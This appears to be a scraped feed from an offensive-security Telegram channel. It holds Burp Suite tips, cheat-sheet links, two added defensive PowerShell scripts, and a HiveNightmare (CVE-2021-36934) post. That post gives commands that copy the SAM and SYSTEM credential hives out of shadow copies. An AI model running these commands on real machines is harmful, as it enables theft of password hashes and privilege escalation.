This channel discusses:

— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc

Disclaimer:
t.iss.one/APT_Notes/6

Chat Link:
t.iss.one/APT_Notes_PublicChat
🔥 HiveNightmare 🔥 Exploit allowing you to read registry hives and SAM data (sensitive) in Windows 10, as well as the SYSTEM and SECURITY hives as non-admin. This exploit uses VSC to extract the SAM, SYSTEM, and SECURITY hives even when in use, and saves…
WINDOWS LPE "HiveNightmare" or "SeriousSAM"

CVE-2021-36934
The problem is aggravated by the fact that a 'shadow copy' of the system drive, where these files can be found, is created when someone performs a Windows Update if that drive is larger than 128GB (!). So, even if your version of Windows 10 wasn't initially impacted, it could be after updating.

1) Check permissions:
icacls.exe C:\Windows\System32\config\SAM

2) Check shadow copies / restore points:
[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM')
[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM')
[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM')
... and so on

3) Copy SAM and SYSTEM files from shadow copy:
[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM', 'C:\Temp\SAM')
[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM', 'C:\Temp\SYSTEM')
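As an added example (not part of the original post), the same two checks from a defender's side: an audit script that reports whether the hive ACL is loose and whether a shadow copy exists, and optionally applies the workaround Microsoft published for this CVE. The -Remediate switch and the output layout are this script's own choices; run it from an elevated prompt.

```powershell
# Added example, not part of the original post: audit a Windows 10 host for the two conditions
# CVE-2021-36934 needs (hive files readable by BUILTIN\Users, and a shadow copy to read them from)
# and optionally apply Microsoft's published workaround. Run from an elevated prompt.
# The -Remediate switch is an assumption of this script, not a documented Microsoft tool.
param([switch]$Remediate)

$configDir = Join-Path $env:windir 'System32\config'
$hives     = 'SAM', 'SYSTEM', 'SECURITY' | ForEach-Object { Join-Path $configDir $_ }
$readBits  = [System.Security.AccessControl.FileSystemRights]::ReadData

# 1) Does the ACL on any hive grant read access to ordinary users?
$exposed = foreach ($hive in $hives) {
    foreach ($ace in (Get-Acl -Path $hive).Access) {
        if ($ace.IdentityReference.Value -eq 'BUILTIN\Users' -and
            $ace.AccessControlType -eq 'Allow' -and
            (([int]$ace.FileSystemRights) -band ([int]$readBits))) {
            [pscustomobject]@{ Hive = $hive; Identity = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
        }
    }
}

# 2) Is there a shadow copy? The live hives are locked, so the loose ACL only matters when a
#    VSS snapshot (e.g. a restore point created by Windows Update) exposes a readable copy.
$shadows = @(Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue)

if ($exposed) {
    Write-Warning 'Hive ACL grants BUILTIN\Users read access:'
    $exposed | Format-Table -AutoSize | Out-Host
} else {
    Write-Host 'Hive ACLs look correct: no read access for BUILTIN\Users.'
}
Write-Host ("Shadow copies present: {0}" -f $shadows.Count)
if ($exposed -and $shadows.Count -gt 0) {
    Write-Warning 'Host is exposed: permissive hive ACL combined with an existing shadow copy.'
}

# 3) Workaround Microsoft documented for this CVE: re-enable ACL inheritance on the config
#    directory contents, then delete existing shadow copies (this also removes restore points,
#    so create a fresh restore point or backup afterwards).
if ($Remediate) {
    icacls "$configDir\*.*" /inheritance:e
    vssadmin delete shadows /for=$env:SystemDrive /quiet
}
```

Deleting shadow copies is the disruptive half of the workaround; the ACL fix alone closes the hole for snapshots created after it is applied, but existing snapshots keep the old permissions.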
#BurpHacksForBounties - Tip 20/30

Burp Suite shortcuts cheat sheet by ChrisADale, published by SANS. This pocket guide will increase your productivity.

https://sansorg.egnyte.com/dd/x19ByeTOpS/
#BurpHacksForBounties - Day 21/30

❤️ Burp Collaborator ❤️ 🙈

Burp Suite Collaborator is a hosted network service offering from PortSwigger which is very useful in manual testing.

See what, how, and why👇🏻
1/n When an injected payload triggers an interaction with some other site, Collaborator is the tool that lets you verify such scenarios. It works on a client-server model.
The public server is hosted by PortSwigger; self-hosting is possible too.
How to use a client? 👇🏻
2/n
Image 1 - Start Collaborator client
Image 2 - Click copy; a custom URL under the <>.burpcollaborator.net domain will be created.
- Use that URL in the payload
Image 3 - Poll to see the request made on the URL.
Image 4 - Req payload

In my case, DNS and HTTP requests were made.
3/n
Useful in :
- Blind SQLi
- SSRF
- XSS
- Detecting any out-of-band resource load you can think of.
- Evading firewall rules, in case outbound TCP requests are blocked but HTTP is allowed
Read more at:
https://portswigger.net/burp/documentation/collaborator
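The thread above shows Collaborator from the tester's side; as an added example (not from the original thread), here is the same out-of-band interaction seen from the network's side: a PowerShell function that flags DNS and HTTP log entries pointing at the Collaborator domain and groups them by the unique subdomain Burp generated. The log lines and their field layout are constructed for this example, so adapt the regexes to your own resolver and proxy formats.

```powershell
# Added example, not from the original thread: flag out-of-band callbacks to Burp Collaborator
# in resolver/proxy logs and group them by the unique subdomain (payload id) Burp generated.
# The log lines and their format are constructed for this example; adapt the regexes to your logs.
$sampleLogs = @(
    '2021-07-20T10:01:02Z dns  client=10.0.0.5 qname=x7k2abc.burpcollaborator.net qtype=A',
    '2021-07-20T10:01:03Z http client=10.0.0.5 url=http://x7k2abc.burpcollaborator.net/ status=200',
    '2021-07-20T10:02:10Z dns  client=10.0.0.9 qname=pd9f1.burpcollaborator.net qtype=A',
    '2021-07-20T10:02:11Z dns  client=10.0.0.9 qname=updates.example.com qtype=A'
)
$oastDomains = @('burpcollaborator.net')   # public Collaborator domain named in the thread

function Find-OastInteraction {
    param([string[]]$Lines, [string[]]$Domains = $oastDomains)
    foreach ($line in $Lines) {
        # hostname from either a DNS query name or the URL of an HTTP request
        $m = [regex]::Match($line, '(?:qname=|url=\w+://)(?<hostname>[A-Za-z0-9.-]+)')
        if (-not $m.Success) { continue }
        $hostName = $m.Groups['hostname'].Value.ToLower().TrimEnd('.')
        foreach ($d in $Domains) {
            if ($hostName -ne $d -and -not $hostName.EndsWith(".$d")) { continue }
            # everything left of the Collaborator domain is the id Burp put into the payload
            $payloadId = if ($hostName -eq $d) { '' } else { $hostName.Substring(0, $hostName.Length - $d.Length - 1) }
            $fields = $line -split '\s+'
            [pscustomobject]@{
                Time      = $fields[0]
                Kind      = $fields[1]                                   # dns or http
                Client    = [regex]::Match($line, 'client=(\S+)').Groups[1].Value
                PayloadId = $payloadId
                Host      = $hostName
            }
        }
    }
}

# One line per payload id: how many interactions, of which kinds, from which internal clients.
Find-OastInteraction -Lines $sampleLogs | Group-Object PayloadId | ForEach-Object {
    '{0}: {1} interaction(s) [{2}] from {3}' -f $_.Name, $_.Count,
        (($_.Group.Kind | Sort-Object -Unique) -join ','),
        (($_.Group.Client | Sort-Object -Unique) -join ',')
}
```

A hit from an internal client that never sent the payload itself (for example a backend fetching a URL on a user's behalf) is exactly the SSRF / blind-injection signal the thread describes, so the Client column is the one to chase.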
Windows Command-Line Obfuscation

Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. As a result, command-line arguments are implemented inconsistently, making the detection of specific commands harder due to the number of variations. This post shows how more than 40 often-used, built-in Windows applications are vulnerable to forms of command-line obfuscation, and presents a tool for analysing other executables.

# https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation

#cheatsheet #cmd #pentest
#BurpHacksForBounties - Day 22/30

🤓🤓 Create your own Burp Extender Plugin in 3 tweets with Java.
Thank you Burp Suite for making it easy

#infosec #appsec #burp @BurpSuiteGuide #bugbountytips #bugbountytip #security
1/n [JAVA]
- Download the API interfaces from Burp -> Extender -> APIs -> Save Interface files.
- Create a package named burp and save the files there; you can use any IDE of your choice.
- Make the IDE ready to build a JAR.
- Create a file named BurpExtender and add the following code.
2/n
- The file named BurpExtender is the entry point for your plugin; extending the interface registers it in Burp on loading. All logic for the plugin goes here.
- Build Jar
- Load Jar in Burp.
3/n
- You can also build Jar from the command line with these commands.

Code location -> cd usercode
location for *.class files -> mkdir build
location for jar -> mkdir bin
Compile code -> javac -d build src/burp/*.java
Build Jar -> jar cf bin/burpextender.jar -C build burp
OFFENSIVE SECURITY CHEATSHEET

— Open Source Intelligence (OSINT)
— Web Pentest
— Network
— Shells methods
— Windows Systems
— Linux Systems
— Other Systems
— Passcracking Hash & Files
— Phishing, RedTeam and SE
— Wireless
— Cryptography
— Pwn
— External Resources

https://cheatsheet.haax.fr/

#cheatsheet #pentest #osint #ad
Top 25 Penetration Testing Skills and Competencies (Detailed)

What soft skills and technical competencies does it take to become a professional penetration tester or ethical hacker? In this article we will discuss in detail the top 25 areas every pentester should be familiar with and the skills you should focus on if you want to become a professional penetration tester.

https://www.infosecmatter.com/top-25-penetration-testing-skills-and-competencies-detailed/

#pentest #skills